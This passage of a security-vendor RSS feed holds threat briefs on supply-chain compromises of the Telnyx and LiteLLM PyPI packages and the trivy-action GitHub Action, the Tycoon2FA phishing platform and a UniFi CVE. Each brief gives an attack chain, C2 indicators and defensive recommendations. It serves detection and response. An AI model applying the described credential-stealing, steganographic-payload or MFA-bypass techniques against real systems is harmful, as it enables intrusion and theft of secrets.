]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>github-actions</category><category>credential-theft</category><category>linux</category></item><item><title>Compromised Telnyx PyPI Package Distributes Credential-Stealing Malware</title><link>https://feed.craftedsignal.io/briefs/2026-03-telnyx-pypi-compromise/</link><pubDate>Mon, 30 Mar 2026 19:15:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-telnyx-pypi-compromise/</guid><description>A threat actor compromised the PyPI package `telnyx`, uploading malicious versions 4.87.1 and 4.87.2 containing credential-stealing malware that exfiltrates data to a C2 server.</description><content:encoded><![CDATA[<p>On March 27, 2026, the <code>telnyx</code> Python package on PyPI was compromised by TeamPCP, resulting in the distribution of malicious versions 4.87.1 and 4.87.2. The attacker, having gained unauthorized access to PyPI credentials, bypassed the legitimate GitHub release pipeline to upload these compromised packages directly. These versions contain malware designed to harvest sensitive credentials from infected systems and exfiltrate them to a command-and-control (C2) server. The malicious packages were available for approximately 6 hours before being quarantined by PyPI. Version 4.87.1 contained a typo preventing execution, making 4.87.2 the fully functional malicious version. This incident highlights the risk of supply chain attacks targeting open-source package repositories, potentially affecting any system that installed the <code>telnyx</code> package during the exposure window.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized access to PyPI credentials for the <code>telnyx</code> package.</li>
<li>The attacker uploads malicious versions 4.87.1 and 4.87.2 of the <code>telnyx</code> package to PyPI, bypassing the legitimate GitHub repository.</li>
<li>When a user installs or upgrades to the malicious <code>telnyx</code> package, the injected malware within <code>telnyx/_client.py</code> executes upon importing the library (<code>import telnyx</code>).</li>
<li>On Linux/macOS systems, the malware spawns a detached subprocess to ensure persistence and downloads a payload hidden inside a WAV audio file (<code>ringtone.wav</code>) from the C2 server at <code>http://83.142.209.203:8080/</code>.</li>
<li>The downloaded payload harvests sensitive credentials, including SSH keys, AWS/GCP/Azure credentials, Kubernetes tokens, Docker configurations, .env files, database credentials, and crypto wallets.</li>
<li>If Kubernetes access is detected, the malware deploys privileged pods to all nodes for lateral movement within the Kubernetes cluster.</li>
<li>The collected data is encrypted using AES-256-CBC and RSA-4096, then exfiltrated to the C2 server, identified by the header <code>X-Filename: tpcp.tar.gz</code>.</li>
<li>On Windows, a binary payload hidden in <code>hangup.wav</code> is downloaded from <code>http://83.142.209.203:8080/</code>, dropped as <code>msbuild.exe</code> in the Startup folder for persistence, and executed with a hidden window, polling the endpoint <code>http://83.142.209.203:8080/raw</code>.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the <code>telnyx</code> PyPI package poses a significant risk to developers and organizations that use the library.  Successful exploitation leads to the theft of sensitive credentials, potentially granting the attacker unauthorized access to critical infrastructure, cloud resources, and sensitive data. TeamPCP&rsquo;s previous campaign against LiteLLM and the similarities in this attack suggest a pattern of targeting open-source projects to infiltrate developer environments and steal secrets.  The impact includes potential data breaches, financial losses, and reputational damage. The exposure window was approximately 6 hours during which vulnerable versions were available.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately check for the presence of malicious <code>telnyx</code> package versions (4.87.1 or 4.87.2) in your environment using the provided commands and uninstall them (<code>pip uninstall telnyx</code>).</li>
<li>Due to the credential-stealing nature of the malware, rotate all potentially exposed secrets, including SSH keys, cloud provider credentials (AWS, GCP, Azure), Kubernetes tokens, Docker registry credentials, database passwords, API keys in .env files, and Telnyx API keys.</li>
<li>Check for persistence mechanisms used by the malware, specifically the <code>audiomon</code> service and associated files on Linux/macOS, and the <code>msbuild.exe</code> executable in the Startup folder on Windows, based on the file paths provided in the &ldquo;Filesystem&rdquo; section.</li>
<li>Block the identified C2 IP address (<code>83.142.209.203</code>) and payload URLs (<code>http://83.142.209.203:8080/ringtone.wav</code>, <code>http://83.142.209.203:8080/hangup.wav</code>, <code>http://83.142.209.203:8080/raw</code>) at your network perimeter.</li>
<li>Deploy the following Sigma rule to detect the creation of <code>msbuild.exe</code> in the Startup folder.</li>
<li>Pin the <code>telnyx</code> package to the safe version 4.87.0 in your project dependencies to prevent future installations of compromised versions.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>supply-chain</category><category>pypi</category><category>credential-theft</category><category>teampcp</category></item><item><title>Compromised trivy-action GitHub Action Leads to Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/</link><pubDate>Mon, 30 Mar 2026 06:24:43 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-trivy-action-supply-chain/</guid><description>The aquasecurity/trivy-action GitHub Action was compromised via git tag repointing, injecting a multi-stage credential stealer into CI/CD pipelines, allowing for the theft of secrets and credentials.</description><content:encoded><![CDATA[<p>On March 19, 2026, CrowdStrike&rsquo;s Engineering team discovered a supply chain compromise targeting the aquasecurity/trivy-action GitHub Action, a popular open-source vulnerability scanner used in CI/CD pipelines. The attackers retroactively poisoned 76 of the scanner’s 77 release tags using git tag repointing, replacing the original entry point with a multi-stage credential stealer. The malicious code operates before the legitimate scanner, masking its activity and allowing workflows to appear normal. This attack highlights the risks associated with mutable tags in Git and the potential for widespread compromise when relying on third-party actions within CI/CD environments. Defenders should implement strong integrity checks and consider using immutable references to mitigate such risks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains write access to the aquasecurity/trivy-action repository.</li>
<li>The attacker uses git tag repointing to modify existing release tags (e.g., 0.24.0), replacing the legitimate entrypoint.sh script with a malicious version.</li>
<li>A developer&rsquo;s CI/CD pipeline includes a step that uses the compromised trivy-action by referencing a poisoned tag (e.g., uses: <a href="mailto:aquasecurity/trivy-action@0.24.0">aquasecurity/trivy-action@0.24.0</a>).</li>
<li>When the workflow runs on a GitHub Actions runner, the runner downloads the compromised action and executes the malicious entrypoint.sh script.</li>
<li>The malicious script enumerates running processes to identify potential credential sources.</li>
<li>The script steals credentials and secrets from the runner&rsquo;s environment, including API keys, deployment tokens, and cloud credentials.</li>
<li>After stealing credentials, the malicious script executes the legitimate Trivy scanner to avoid raising suspicion.</li>
<li>The stolen credentials are used to gain unauthorized access to internal infrastructure and resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the trivy-action GitHub Action could impact a significant number of organizations relying on this popular scanner in their CI/CD pipelines. With 76 of 77 release tags poisoned, the potential scope of the attack is broad. Successful exploitation leads to the theft of sensitive credentials, enabling attackers to access internal infrastructure, deploy malicious code, or exfiltrate sensitive data. The silent nature of the attack, with the legitimate scanner still running, makes detection challenging and increases the dwell time of the attacker.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable process monitoring on GitHub Actions runners to detect suspicious script execution and unusual process trees (reference: Attack Chain).</li>
<li>Implement integrity checks for third-party actions used in CI/CD pipelines to verify their authenticity and prevent tampering (reference: Overview).</li>
<li>Consider using immutable references (e.g., commit SHAs instead of tags) for GitHub Actions to prevent tag repointing attacks (reference: Overview).</li>
<li>Deploy the Sigma rule below to detect suspicious bash scripts executing in the context of GitHub Action runners (reference: rules).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>github-actions</category></item><item><title>Tycoon2FA Phishing-as-a-Service Platform Persists After Takedown</title><link>https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/</link><pubDate>Sun, 29 Mar 2026 08:34:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-persistence/</guid><description>The Tycoon2FA phishing-as-a-service (PhaaS) platform, used to bypass MFA and compromise email accounts, saw a temporary decrease in activity after a law enforcement takedown, but cloud compromises have since returned to pre-disruption levels with unchanged TTPs, indicating continued threat actor activity.</description><content:encoded><![CDATA[<p>On March 4, 2026, Europol announced a technical disruption of Tycoon2FA, a subscription-based phishing-as-a-service (PhaaS) platform enabling cybercriminals to bypass MFA and compromise email accounts. The takedown involved seizing 330 domains. Despite this disruption, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and Tycoon2FA’s tactics, techniques, and procedures (TTPs) remain unchanged. This resurgence suggests that the actors behind Tycoon2FA are adaptive and persistent. Tycoon2FA began operations in 2023, and in mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. The platform also had a competitor named RaccoonO365, which law enforcement took down in September 2025.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victims receive phishing emails designed to mimic legitimate login pages.</li>
<li>Phishing emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.</li>
<li>Upon CAPTCHA validation, victims&rsquo; session cookies are stolen by the attackers.</li>
<li>A JavaScript (JS) file extracts victims&rsquo; email addresses.</li>
<li>Victims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.</li>
<li>Victims enter their credentials into the fake login pages, which are then captured by the attackers.</li>
<li>Stolen credentials are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.</li>
<li>Attackers authenticate to the victim&rsquo;s cloud environment using the stolen cookies and credentials, gaining unauthorized access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Tycoon2FA was responsible for 62% of all phishing attempts blocked by Microsoft in mid-2025, generating over 30 million malicious emails in a single month. Successful attacks lead to unauthorized access to victims&rsquo; cloud environments, potentially resulting in data theft, business email compromise (BEC), and further malicious activities. Despite law enforcement takedowns, the platform&rsquo;s rapid resurgence demonstrates the resilience of PhaaS operations and their potential for significant damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor network traffic for connections to known phishing domains or newly registered domains, correlating with user agent strings and HTTP referrer headers common in phishing kits, to detect initial access attempts. Deploy the network_connection Sigma rule to identify suspicious connections.</li>
<li>Implement detections for suspicious JavaScript execution within browser environments attempting to steal session cookies or extract email addresses. Enable webserver and proxy logging to capture these events and deploy the process_creation Sigma rule to identify associated processes.</li>
<li>Monitor authentication logs for successful logins from unusual locations or using suspicious user agents after a user has visited a known phishing site. Analyze user authentication patterns and correlate with other security events to detect compromised accounts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>phishing</category><category>credential-theft</category><category>cloud</category></item><item><title>TeamPCP Backdoors Telnyx PyPI Package with Steganographic Malware</title><link>https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/</link><pubDate>Sat, 28 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-teampcp-telnyx/</guid><description>The TeamPCP threat actor compromised the Telnyx PyPI package, injecting credential-stealing malware hidden within WAV audio files to target Linux, macOS, and Windows systems.</description><content:encoded><![CDATA[<p>On March 27, 2026, the Telnyx package on the Python Package Index (PyPI) was compromised by the threat actor TeamPCP. Malicious versions 4.87.1 and 4.87.2 were uploaded, containing credential-stealing malware concealed within WAV audio files. This supply-chain attack targeted developers using the Telnyx Python SDK, a popular package with over 740,000 monthly downloads, used for integrating communication services into applications. The malicious code resides in the <code>telnyx/_client.py</code> file and executes upon import. The compromise is believed to have originated from stolen credentials for the publishing account on the PyPI registry. TeamPCP has been linked to previous supply-chain attacks and wiper campaigns against Iranian systems, highlighting the group&rsquo;s focus on disrupting software development and infrastructure.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>TeamPCP gains unauthorized access to the Telnyx PyPI account, likely through credential theft.</li>
<li>Malicious versions 4.87.1 and 4.87.2 of the Telnyx package are published to PyPI.</li>
<li>When a developer installs the compromised Telnyx package, the <code>telnyx/_client.py</code> file is executed upon import.</li>
<li>On Linux and macOS, a detached process is spawned to download a second-stage payload disguised as a WAV audio file (<code>ringtone.wav</code>) from a remote command-and-control (C2) server.</li>
<li>Steganography is used to hide malicious code within the WAV file&rsquo;s data frames.</li>
<li>The embedded payload is extracted using an XOR-based decryption routine and executed in memory.</li>
<li>The malware harvests sensitive data, including SSH keys, credentials, cloud tokens, cryptocurrency wallets, and environment variables.</li>
<li>If Kubernetes is present, the malware enumerates cluster secrets and deploys privileged pods to access underlying host systems. On Windows, a different WAV file (<code>hangup.wav</code>) is downloaded that extracts and saves an executable named <code>msbuild.exe</code> to the startup folder for persistence.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack could result in widespread compromise of systems utilizing the Telnyx Python SDK. Over 740,000 monthly downloads indicate a large potential victim pool. Stolen credentials and secrets can lead to unauthorized access to cloud resources, sensitive data exfiltration, and further lateral movement within compromised networks. For systems running Kubernetes, the attacker could gain control over the entire cluster, leading to significant disruption and data loss. Developers who installed the malicious packages are advised to consider their systems fully compromised and rotate all secrets as soon as possible.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Identify and remove Telnyx versions 4.87.1 and 4.87.2 from all environments, reverting to version 4.87.0 as recommended by the vendor.</li>
<li>Monitor network connections for processes spawned by Python interpreters (<code>python.exe</code>, <code>python3</code>) attempting to download files with the <code>.wav</code> extension, using the &ldquo;Detect Suspicious Python WAV Download&rdquo; Sigma rule provided below.</li>
<li>Implement stricter controls and multi-factor authentication for PyPI accounts used to publish packages to prevent similar supply chain attacks.</li>
<li>Deploy the &ldquo;Detect msbuild.exe in Startup Folder&rdquo; Sigma rule to identify potential persistence attempts on Windows systems.</li>
<li>Rotate all secrets and credentials on any system that has imported the malicious Telnyx package.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>supply chain attack</category><category>pypi</category><category>credential theft</category><category>steganography</category></item><item><title>Tycoon2FA PhaaS Platform Resurgence After Takedown</title><link>https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-resurgence/</link><pubDate>Sat, 28 Mar 2026 08:28:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-tycoon2fa-resurgence/</guid><description>The Tycoon2FA phishing-as-a-service (PhaaS) platform, disrupted in March 2026, has resurged with consistent tactics, employing adversary-in-the-middle (AITM) techniques to bypass MFA and compromise email accounts through phishing campaigns, credential theft, and session cookie hijacking.</description><content:encoded><![CDATA[<p>Tycoon2FA is a subscription-based PhaaS platform that enables cybercriminals to bypass multifactor authentication (MFA) and compromise email accounts using adversary-in-the-middle (AITM) techniques. The platform gained prominence in 2025, reportedly generating over 30 million malicious emails in a single month and accounting for 62% of all phishing attempts blocked by Microsoft at one point. On March 4, 2026, Europol announced a technical disruption of Tycoon2FA, seizing 330 domains forming the platform’s core infrastructure. Despite this takedown, CrowdStrike Falcon Complete observed a short-term decrease in Tycoon2FA activity followed by a return to pre-disruption levels. The persistence of the platform&rsquo;s original tactics, techniques, and procedures (TTPs) suggests that the actors behind Tycoon2FA remain active and pose a continued threat. Defenders should maintain vigilance.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victims receive phishing emails designed to appear legitimate.</li>
<li>These emails direct victims to Tycoon2FA CAPTCHA pages hosted on attacker-controlled domains.</li>
<li>Upon CAPTCHA validation, a JavaScript (JS) file extracts the victim&rsquo;s email address.</li>
<li>The victim is then redirected to a fake Microsoft 365 or Google login page hosted on a Tycoon2FA domain.</li>
<li>Victims enter their credentials, which are proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.</li>
<li>The attacker steals the victim&rsquo;s session cookies and credentials.</li>
<li>The attacker authenticates to the victim&rsquo;s cloud environment using the stolen cookies and credentials.</li>
<li>The attacker gains access to the victim&rsquo;s email and other cloud-based resources, potentially leading to data exfiltration or further malicious activity.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Tycoon2FA&rsquo;s operations began in 2023, and by mid-2025, it was responsible for 62% of all phishing attempts blocked by Microsoft, generating over 30 million malicious emails in a single month. A successful attack can lead to unauthorized access to sensitive data, business email compromise, financial loss, and reputational damage. The resurgence of Tycoon2FA following the takedown indicates the platform remains a significant threat, highlighting the need for robust defenses against phishing and credential theft.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor email traffic for unusual patterns and sender addresses to detect phishing attempts associated with Tycoon2FA (IOC: phishing emails).</li>
<li>Implement and tune web filtering rules to block access to known Tycoon2FA domains and newly registered domains that may be used for phishing campaigns (IOC: Tycoon2FA domain).</li>
<li>Deploy the Sigma rule to detect JavaScript files that attempt to extract email addresses from web pages, a technique used by Tycoon2FA to target victims.</li>
<li>Review and reinforce MFA policies and educate users about the risks of phishing and credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>phishing</category><category>credential-theft</category><category>MFA-bypass</category></item><item><title>Tycoon2FA Phishing-as-a-Service Resurgence After Takedown</title><link>https://feed.craftedsignal.io/briefs/2026-04-tycoon2fa-resurgence/</link><pubDate>Sat, 28 Mar 2026 08:20:54 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-tycoon2fa-resurgence/</guid><description>The Tycoon2FA Phishing-as-a-Service platform, used to bypass multifactor authentication (MFA), has resurged to pre-takedown levels of activity following a disruption effort in March 2026, maintaining its original tactics, techniques, and procedures (TTPs) for credential harvesting and cloud compromise.</description><content:encoded><![CDATA[<p>On March 4, 2026, Europol announced a technical disruption of the Tycoon2FA Phishing-as-a-Service (PhaaS) platform, which enabled cybercriminals to bypass multifactor authentication (MFA) and compromise email accounts. The takedown involved seizing 330 domains that formed the platform’s core infrastructure. However, following the takedown, CrowdStrike observed only a short-term decrease in Tycoon2FA campaign activity. The volume of cloud compromises has since returned to pre-disruption levels, and the platform continues to employ previously observed TTPs. Tycoon2FA, active since 2023, was responsible for a significant portion of phishing attempts, purportedly generating over 30 million malicious emails in a single month in mid-2025. The platform primarily targets Microsoft 365 and Google accounts using adversary-in-the-middle (AITM) techniques.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Victims receive phishing emails directing them to Tycoon2FA CAPTCHA pages.</li>
<li>Upon CAPTCHA validation, victims&rsquo; session cookies are stolen.</li>
<li>A JavaScript (JS) file is used to extract victims’ email addresses.</li>
<li>Victims are redirected to fake Microsoft 365 or Google login pages hosted on a Tycoon2FA domain.</li>
<li>Victims enter their credentials into the fake login pages, which are then proxied to a legitimate Microsoft 365 cloud account via an obfuscated JS file.</li>
<li>The threat actor authenticates to the victim’s cloud environment using the stolen cookies and credentials.</li>
<li>Once authenticated, the attacker gains access to the victim&rsquo;s email and other cloud resources.</li>
<li>The attacker can then perform actions such as data exfiltration, sending phishing emails to other targets, or further compromising the organization&rsquo;s environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The resurgence of Tycoon2FA demonstrates the resilience of PhaaS platforms and their operators. The platform was responsible for a large percentage of phishing attacks in 2025, including 62% of all phishing attempts blocked by Microsoft in mid-2025, and generating over 30 million malicious emails in a single month. Successful attacks can lead to unauthorized access to sensitive data, financial losses, and reputational damage. The observed return to pre-disruption activity levels indicates a sustained threat to organizations relying on MFA for account security.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Tycoon2FA Phishing Redirection&rdquo; Sigma rule to detect potential phishing attempts redirecting to Tycoon2FA infrastructure.</li>
<li>Monitor email traffic for patterns indicative of phishing campaigns, focusing on emails directing users to external login pages, as described in the Attack Chain.</li>
<li>Implement strict session management policies and regularly review user authentication logs for suspicious activity following successful authentication as described in the attack chain, step 7.</li>
<li>Block known Tycoon2FA domains at the DNS resolver, as referenced in the IOC section.</li>
<li>Educate users about the tactics used by Tycoon2FA, specifically the use of CAPTCHA pages to steal session cookies, as described in the Attack Chain, step 2.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>phishing</category><category>credential-theft</category><category>MFA-bypass</category><category>phishing-as-a-service</category></item><item><title>Compromised trivy-action GitHub Action Enables Credential Theft</title><link>https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/</link><pubDate>Sat, 28 Mar 2026 08:12:22 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-trivy-action-compromise/</guid><description>The trivy-action GitHub Action was compromised via git tag repointing, with attackers poisoning 76 of 77 release tags to inject a multi-stage credential stealer before the legitimate scanner runs, granting attackers access to CI/CD pipeline secrets.</description><content:encoded><![CDATA[<p>On March 19, 2026, a spike in script execution detections on Linux-based GitHub Actions runners led to the discovery of a supply chain compromise affecting the aquasecurity/trivy-action GitHub Action. The attackers retroactively poisoned 76 of the 77 release tags by repointing them to malicious commits. This manipulation replaced the legitimate entry point with a multi-stage credential stealer. The malicious code operates silently before the legitimate Trivy scanner logic is executed, which allows the malicious activity to remain hidden as workflows appear to complete normally. Aqua Security has confirmed the compromise and removed the malicious artifacts. This incident highlights the risks associated with trusting third-party actions in CI/CD pipelines and the potential for attackers to gain access to sensitive credentials and internal infrastructure.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A developer triggers a GitHub Actions workflow that utilizes the <code>aquasecurity/trivy-action</code>.</li>
<li>The GitHub Actions runner downloads the specified version of the <code>trivy-action</code> from GitHub.</li>
<li>Due to tag repointing, the downloaded action contains malicious code in the <code>entrypoint.sh</code> script.</li>
<li>The malicious <code>entrypoint.sh</code> script executes a multi-stage credential theft operation.</li>
<li>The script enumerates process IDs (PIDs) to discover runner processes.</li>
<li>After credential theft, the legitimate Trivy scanner logic is executed to maintain the appearance of normal operation.</li>
<li>Stolen credentials and secrets are likely exfiltrated to a attacker controlled server.</li>
<li>The attacker uses the stolen credentials to gain unauthorized access to internal infrastructure, cloud resources, or other sensitive systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The compromise of the trivy-action GitHub Action could have resulted in widespread credential theft across numerous organizations using the affected versions. With 76 of 77 release tags poisoned, a vast majority of users were exposed. Successful credential theft can lead to unauthorized access to sensitive systems, data breaches, and potential supply chain attacks affecting downstream customers. The incident highlights the critical importance of supply chain security and the need for robust monitoring and detection mechanisms in CI/CD pipelines.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect your CI/CD pipelines for usage of the <code>aquasecurity/trivy-action</code> GitHub Action and verify the integrity of the action being used.</li>
<li>Implement the Sigma rule <code>Detect Suspicious Script Execution in GitHub Actions Runner</code> to identify potentially malicious script execution within GitHub Actions runners.</li>
<li>Monitor process execution within GitHub Actions runners for unusual or unexpected activity that deviates from normal CI/CD operations (reference: Attack Chain step 5).</li>
<li>Enable detailed logging on GitHub Actions runners to capture process execution, network connections, and file system activity for forensic analysis and threat hunting.</li>
<li>Implement strong access controls and least privilege principles for GitHub Actions secrets and credentials to limit the impact of potential credential theft.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>credential-theft</category><category>github-actions</category></item><item><title>UniFi Network Controller Improper Certificate Verification Vulnerability (CVE-2019-25652)</title><link>https://feed.craftedsignal.io/briefs/2026-03-unifi-cert-bypass/</link><pubDate>Fri, 27 Mar 2026 22:16:19 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-unifi-cert-bypass/</guid><description>UniFi Network Controller versions before 5.10.22 and 5.11.x before 5.11.18 contain an improper certificate verification vulnerability, enabling adjacent network attackers to perform man-in-the-middle attacks by presenting a fraudulent SSL certificate during SMTP connections to intercept traffic and steal credentials.</description><content:encoded>&lt;p>CVE-2019-25652 affects UniFi Network Controller versions prior to 5.10.22 and 5.11.x before 5.11.18. The vulnerability stems from an improper certificate verification process during SMTP connections. An attacker positioned on an adjacent network can exploit this weakness to conduct man-in-the-middle (MitM) attacks. By presenting a false SSL certificate, the attacker can intercept SMTP traffic intended for the UniFi Network Controller, potentially gaining access to sensitive information…&lt;/p>
</content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>unifi</category><category>mitm</category><category>credential-theft</category><category>cve-2019-25652</category></item><item><title>Malicious LiteLLM Versions Harvest Credentials</title><link>https://feed.craftedsignal.io/briefs/2026-03-litellm-supply-chain/</link><pubDate>Thu, 26 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-litellm-supply-chain/</guid><description>Compromised versions of the LiteLLM package (1.82.7 and 1.82.8) on PyPI contained malware designed to harvest sensitive credentials and files, exfiltrating them to a remote API, impacting users who installed and ran the package.</description><content:encoded><![CDATA[<p>On March 25, 2026, two malicious versions of the <code>litellm</code> package (versions 1.82.7 and 1.82.8) were discovered on the PyPI repository. These versions were found to contain automatically activated malware. The malicious code was designed to harvest sensitive credentials and files from systems where the compromised packages were installed. This supply chain attack follows a previous API token exposure stemming from a compromised trivy dependency, indicating a potential escalation in targeting the <code>litellm</code> project. The compromised packages exfiltrate stolen data to a remote API controlled by the attacker.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker compromises the <code>litellm</code> PyPI package repository, likely leveraging exposed credentials.</li>
<li>The attacker injects malicious code into versions 1.82.7 and 1.82.8 of the <code>litellm</code> package. The malicious code is automatically activated upon installation.</li>
<li>A user installs either <code>litellm</code> version 1.82.7 or 1.82.8 via <code>pip</code>.</li>
<li>Upon execution, the malicious code begins harvesting credentials and files accessible to the <code>litellm</code> environment. This may include API keys, tokens, and other sensitive information.</li>
<li>The malware establishes a network connection to a remote API server controlled by the attacker.</li>
<li>The harvested credentials and files are exfiltrated to the attacker&rsquo;s remote API server.</li>
<li>The attacker gains unauthorized access to services and data protected by the stolen credentials.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack directly impacts any user who installed the malicious <code>litellm</code> packages (versions 1.82.7 and 1.82.8). Successful credential harvesting allows attackers to pivot and compromise other systems and services accessible with the stolen credentials, potentially leading to data breaches, unauthorized access, and further lateral movement within victim environments. The number of affected users is currently unknown, but the popularity of <code>litellm</code> suggests a potentially wide impact.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately revoke and rotate any credentials accessible to environments where <code>litellm</code> versions 1.82.7 or 1.82.8 were installed (description).</li>
<li>Deploy the following Sigma rule to detect installations of the affected <code>litellm</code> versions (Sigma rule).</li>
<li>Monitor network traffic for connections originating from <code>litellm</code> processes to external, untrusted APIs (network_connection).</li>
<li>Implement strong dependency management practices, including the use of software composition analysis tools, to identify and prevent the installation of malicious packages (overview).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>malware</category><category>credential-theft</category></item><item><title>LiteLLM Package Compromised with Credential-Stealing Code via Trivy</title><link>https://feed.craftedsignal.io/briefs/2026-03-litellm-credential-theft/</link><pubDate>Wed, 25 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-litellm-credential-theft/</guid><description>The LiteLLM package was compromised and infected with credential-stealing code through a supply chain attack leveraging the Trivy vulnerability scanner.</description><content:encoded><![CDATA[<p>On March 24, 2026, reports surfaced indicating that the LiteLLM package, a library designed to provide a unified interface for interacting with various large language models, was compromised and injected with malicious code. This compromise occurred through a vulnerability in Trivy, a widely-used open-source vulnerability scanner. The malicious code was designed to steal credentials, potentially including API keys and other sensitive information used to access and manage language models. The scope of the compromise is currently unknown, but given the popularity of both LiteLLM and Trivy, the potential impact could be significant across various sectors using LLMs. This incident highlights the risks associated with supply chain vulnerabilities and the importance of thorough security audits of third-party dependencies.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A vulnerability is exploited within Trivy, potentially during its build or update process.</li>
<li>The attacker leverages this vulnerability to inject malicious code into the LiteLLM package during its build or release process.</li>
<li>Users download and install the compromised LiteLLM package from the official repository (e.g., PyPI).</li>
<li>Upon execution of the infected LiteLLM package, the malicious code is triggered.</li>
<li>The malicious code collects credentials, such as API keys, environment variables, or configuration files, from the user&rsquo;s system or environment.</li>
<li>The stolen credentials are exfiltrated to a remote server controlled by the attacker using network protocols like HTTP/S.</li>
<li>The attacker uses the stolen credentials to access and control the victim&rsquo;s accounts, resources, and data related to language model services.</li>
<li>The attacker may further exploit the compromised systems for lateral movement, data exfiltration, or other malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful compromise of the LiteLLM package can lead to significant damage, including unauthorized access to language model APIs, data breaches, and financial losses. The number of affected users and organizations is currently unknown. Sectors relying heavily on LLMs, such as AI development, research, and various industries integrating AI-powered applications, are particularly vulnerable. If successful, the attack can result in the exposure of sensitive data, disruption of services, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement integrity checks on all downloaded packages to verify their authenticity and prevent the installation of compromised versions (reference: overview).</li>
<li>Monitor network traffic for suspicious outbound connections originating from processes associated with the LiteLLM package, looking for connections to unknown or malicious IPs (reference: Attack Chain, step 6).</li>
<li>Deploy the Sigma rules provided below to detect potential credential theft and exfiltration attempts (reference: rules).</li>
<li>Implement strict access controls and least privilege principles to limit the impact of compromised credentials (reference: Impact).</li>
<li>Conduct regular security audits of all third-party dependencies and use software composition analysis tools to identify and remediate vulnerabilities (reference: Overview).</li>
</ul>
